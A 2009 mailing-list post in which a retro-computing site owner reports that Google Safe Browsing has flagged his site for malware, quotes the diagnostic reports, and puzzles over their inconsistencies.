Date : Tue, 23 Jun 2009 00:22:05 +0200
From : rick@... (Rick Murray)
Subject: Potential malware warning - very OT but...
Hello everybody,
This is extremely off-topic, but as Beeb stuff is hosted on my site, I'd
be failing in my duty as a conscientious person if I didn't say
anything. For reasons that will become clear, I couldn't exactly add
this message to my website.
If you use a PC to access heyrick.co.uk, you may have already
encountered the bright red "panic! panic! pee in your pant(ie)s now!"
warning about malware on my site.
I, personally, have a rather lackadaisical attitude to who is accessing
my site. I want your name and email address if you are buying something,
or want support... but beyond that, I don't really care. I don't use
cookies, it's nice to know what people are looking at, but since I've
spent *EIGHT* years offline (can't believe Paul Vigay is no longer!
sob!), I am not all obsessed with how many hits I get. If I get a
million, cool. If I get none, whatever...
So the idea of malware is like a TOTAL anathema. I might work a 35 hour
week on minimum wage, but somehow it's rather more satisfying than
ripping off bank accounts.
My friend in London (hi! he reads this list) sent me the report:
--8<--------
What is the current listing status for www.heyrick.co.uk?
Site is listed as suspicious - visiting this web site may harm your
computer.
Part of this site was listed for suspicious activity 2 time(s) over the
past 90 days.
What happened when Google visited this site?
Of the 139 pages we tested over the past 90 days, 73 page(s) resulted in
malicious software being downloaded and installed without user consent.
The last time Google visited this site was on 2009-06-21, and the last
time suspicious content was found on this site was on 2009-06-21.
Malicious software is hosted on 1 domain(s), including 92.38.0.0/.
1 domain(s) appear to be functioning as intermediaries for distributing
malware to visitors of this site, including m-analytics.net/.
This site was hosted on 1 network(s) including AS39451 (MELBOURNE).
Has this site acted as an intermediary resulting in further distribution
of malware?
Over the past 90 days, www.heyrick.co.uk did not appear to function as
an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites,
which would cause us to show the warning message.
[snip "next steps" stuff]
--8<--------
My site is actually hosted on www2.squirrelinternet.co.uk; I'm sure some
tool or other will tell you where that is located. I *think* Manchester.
Sure as hell isn't Melbourne!
Oh, and while you are scratching your head, perhaps you can ponder why
my site is reported as 73 of 139 pages caused malicious software to be
installed (wonder how they tested that?!?), yet a coupla paragraphs
later it says my site hasn't hosted malicious software. Eh!?!?
My friend then looked at this Melbourne server:
--8<--------
Safe Browsing Diagnostic page for AS39451 (MELBOURNE).
What happened when Google visited sites hosted on this network?
Of the 2223 site(s) we tested on this network over the past 90 days, 99
site(s), including, for example, flixman.com/, heyrick.co.uk/,
medelhawaii.com/, served content that resulted in malicious software
being downloaded and installed without user consent.
The last time Google tested a site on this network was on 2009-06-22,
and the last time suspicious content was found was on 2009-06-21.
Has this network hosted sites acting as intermediaries for further
malware distribution?
Over the past 90 days, we found 4 site(s) on this network, including,
for example, buyonlineticket.com/, reallifemarketing.org/,
visaworld.us/, that appeared to function as intermediaries for the
infection of 4 other site(s) including, for example, devimultiplex.com/,
skinfoways.com/, toolshed.co.uk/.
Has this network hosted sites that have distributed malware?
Yes, this network has hosted sites that have distributed malicious
software in the past 90 days. We found 3 site(s), including, for
example, visaworld.us/, digitalbroadcasters.co.uk/,
buyonlineticket.com/, that infected 5 other site(s), including, for
example, tnydeli.co.uk/, mcpatiala.com/, devimultiplex.com/.
[next steps stuff omitted]
--8<--------
If "visaworld.us", "buyonlineticket.com", and
"digitalbroadcasters.co.uk" are real sites and not viable hoaxes (like
various misspellings of Google and Microsoft...), then this is a bigger
problem than just my site. Furthermore, it's little comfort to be lumped
in with the likes of visaworld, but it's certainly odd. Oh, and don't do
the Google maths, I'm finding this stuff doesn't seem to be adding up!
Still have no idea what Melbourne has to do with anything.
I have a trusted friend (a different one, yes, I have more than one
friend and they're real people too! <giggle>) who I've given carte
blanche to do whatever is necessary to sort this. I hope it is some
nasty DNS spoof or some giant cache site that's gone badly astray, or
maybe Google itself?
However if anything has managed to compromise heyrick (amid the sftp and
ssh!), then it'll be ripped out - even if that means rm'ing the whole
damn site. Well, no, there appear to be 66 good pages!
On the plus side, I've just signed a contract for 8Mbit ADSL which I
think ought to arrive in a week or two. FINALLY! Then I can spend all my
spare time looking at really stupid stuff on YouTube :-) instead of
doing anything remotely useful. At least I'll be able to answer mails
with a better turnaround than ~ two weeks!
ANYWAY, thanks for reading, and if you plan to access my site on a PC
(amid all those scary warnings), make sure you are running
anti-everything and lock your system up tighter than a Victorian corset.
Or use a RISC OS machine and go "nerr-nerr!". :-)
Best wishes,
a confused and somewhat irked Rick...
--
Rick Murray, irregular internet access at local library.
BBC B: ANFS, 2 x 5.25" floppies, EPROM prog, Acorn TTX
E01S FileStore, A3000/A5000/RiscPC/various PCs/blahblah...